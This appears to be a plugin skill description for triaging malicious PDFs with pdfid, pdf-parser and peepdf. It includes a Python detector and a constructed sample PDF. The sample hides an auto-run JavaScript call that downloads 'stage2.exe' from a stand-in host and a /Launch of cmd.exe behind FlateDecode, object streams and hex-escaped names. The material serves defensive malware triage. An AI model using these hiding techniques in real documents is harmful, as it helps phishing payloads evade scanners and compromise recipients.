Performs static analysis on malicious PDFs using peepdf, pdfid, and pdf-parser to extract embedded JavaScript, shellcode, and suspicious objects. Useful for malware reverse engineering and DFIR.
Install: `npx claudepluginhub killvxk/cybersecurity-skills-zh`

This skill uses the workspace's default tool permissions.

- Triage suspicious PDF attachments from phishing emails
Analyzes malicious PDFs using peepdf, pdfid, and pdf-parser to extract JavaScript, shellcode, suspicious objects, and IOCs for malware triage and forensics.
Performs static analysis of malicious PDF documents using peepdf, pdfid, and pdf-parser to extract embedded JavaScript, shellcode, and suspicious objects. Useful for triaging phishing attachments and malware forensics.
Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to detect embedded JavaScript, shellcode, exploits, and suspicious objects without opening the file in a reader, and extracts payloads for further analysis in malware investigations.
| Concept | Definition |
|---|---|
| /OpenAction | Action executed automatically when the PDF is opened |
| /JavaScript, /JS | JavaScript action embedded in a PDF object; /JS holds the code as a string or as a reference to a stream |
| /Launch | Action that launches an external application |
| /EmbeddedFile | A file embedded inside the PDF structure |
| FlateDecode | Standard zlib compression filter; also used to hide content from raw keyword scans, which cannot see inside a compressed stream |
| Object streams (/ObjStm) | PDF objects stored inside a compressed stream; their keywords are invisible until the stream is inflated |
| Tool | Purpose |
|---|---|
| peepdf / peepdf-3 | Interactive PDF analysis with JavaScript emulation |
| pdfid.py | Quick triage by scanning the raw bytes for suspicious keywords (does not inflate streams) |
| pdf-parser.py | Deep object-level PDF parsing, including filter decoding and object-stream parsing |
| VirusTotal | Hash lookup and cross-checking of AV detections |
| CyberChef | Decoding and transforming extracted payloads |
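The two tables above describe a two-pass workflow: a raw keyword scan (the pdfid view) followed by object-level parsing with stream inflation (the pdf-parser view). The Python below is an added illustration of that workflow; it is not the skill's own code and not a reimplementation of the named tools. It builds a constructed sample PDF (the object layout, the `example.invalid` URL and the `cmd.exe` launch target are invented for the demo, not taken from any real sample) in which the /Launch action and the callback URL are hidden by FlateDecode and an object stream, and a hex-escaped name (`/J#61vaScript`) would defeat a plain grep. It then reports what a raw scan sees versus what a scan after inflating streams sees.

```python
import re
import zlib
from collections import Counter

# Subset of the keywords pdfid.py counts.
KEYWORDS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
            b"/EmbeddedFile", b"/ObjStm", b"/URI"]

# "<num> 0 obj << dict >> [stream ... endstream] endobj" (flat objects, LF line ends;
# enough for the constructed sample, not a general PDF parser).
OBJ_RE = re.compile(
    rb"(\d+) 0 obj\s*<<(.*?)>>\s*(?:stream\n(.*?)\nendstream\s*)?endobj", re.S)
URL_RE = re.compile(rb"https?://[^\s\"'()<>]+")


def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes in PDF names so /J#61vaScript counts as /JavaScript.
    pdfid.py does this too; a plain grep for '/JavaScript' would miss the escaped form."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes, normalize: bool = True) -> dict:
    """Count suspicious keywords in a byte buffer; this is all a raw scan sees."""
    buf = normalize_names(data) if normalize else data
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", buf))
            for k in KEYWORDS}


def iter_objects(pdf: bytes):
    """Yield (object number, dictionary bytes, stream body) for each indirect object.
    FlateDecode bodies are inflated; bodies that fail to inflate are yielded as None."""
    for m in OBJ_RE.finditer(pdf):
        num, dct, body = int(m.group(1)), m.group(2), m.group(3)
        if body is not None and b"/FlateDecode" in normalize_names(dct):
            try:
                body = zlib.decompress(body)
            except zlib.error:
                body = None  # truncated or deliberately corrupted stream
        yield num, dct, body


def triage(pdf: bytes) -> dict:
    """Raw keyword counts (the pdfid view) next to counts after inflating every
    FlateDecode stream, including /ObjStm object streams (the pdf-parser -O view)."""
    raw = count_keywords(pdf)
    deep = Counter(raw)
    urls = set(URL_RE.findall(pdf))
    js_objects = set()
    for num, dct, body in iter_objects(pdf):
        names = normalize_names(dct)
        if b"/JS" in names or b"/JavaScript" in names:
            js_objects.add(num)
        # /JS may point at another object that holds the code as a stream.
        js_objects.update(int(n) for n in re.findall(rb"/JS\s+(\d+) 0 R", names))
        if body is not None:
            for k, v in count_keywords(body).items():
                deep[k] += v
            urls.update(URL_RE.findall(body))
    return {"raw": raw, "deep": dict(deep),
            "js_objects": sorted(js_objects),
            "urls": sorted(u.decode() for u in urls)}


def build_sample_pdf() -> bytes:
    """Constructed sample (not real malware): /OpenAction runs JavaScript kept in a
    FlateDecode stream, so the callback URL only appears after inflation, and a
    /Launch action sits inside a compressed object stream where a raw scan cannot see it."""
    js = b'app.launchURL("http://example.invalid/stage2.exe", true);'
    js_stream = zlib.compress(js)
    hdr = b"6 0 "  # object stream header: object 6 starts at offset 0
    objstm = zlib.compress(hdr + b"<< /Type /Action /S /Launch /F (cmd.exe) >>")
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R "
        b"/OpenAction << /S /J#61vaScript /JS 4 0 R >> >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n",
        b"4 0 obj\n<< /Filter /FlateDecode /Length %d >>\nstream\n" % len(js_stream)
        + js_stream + b"\nendstream\nendobj\n",
        b"5 0 obj\n<< /Type /ObjStm /N 1 /First %d /Filter /FlateDecode /Length %d >>"
        b"\nstream\n" % (len(hdr), len(objstm)) + objstm + b"\nendstream\nendobj\n",
        b"trailer\n<< /Root 1 0 R >>\n%EOF\n",
    ])


if __name__ == "__main__":
    result = triage(build_sample_pdf())
    for label, counts in (("raw scan", result["raw"]), ("after inflating", result["deep"])):
        print(label, {k: v for k, v in counts.items() if v})
    print("JS objects:", result["js_objects"], "URLs:", result["urls"])
```

The raw pass finds /OpenAction, /JavaScript, /JS and /ObjStm but reports /Launch as 0 and no URL; only the second pass, after inflating object 4 and the object stream in object 5, surfaces the /Launch action and the callback URL. With the real tools the same two views are `pdfid.py sample.pdf` for the raw scan, `pdf-parser.py -O -s Launch sample.pdf` to parse object streams while searching for a keyword, and `pdf-parser.py -o 4 -f -d js.bin sample.pdf` to apply the filter to object 4 and dump the JavaScript for CyberChef or peepdf.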
Analysis report: PDF-MAL-[date]-[sequence number]
File: [filename.pdf]
SHA-256: [hash]
Suspicious keywords: [/JS, /OpenAction, etc.]
Objects containing JavaScript: [object IDs]
Extracted URLs: [list]
Shellcode detected: [yes/no]
Embedded files: [count and type]
VirusTotal detections: [X/Y engines]
Risk level: [Critical/High/Medium/Low]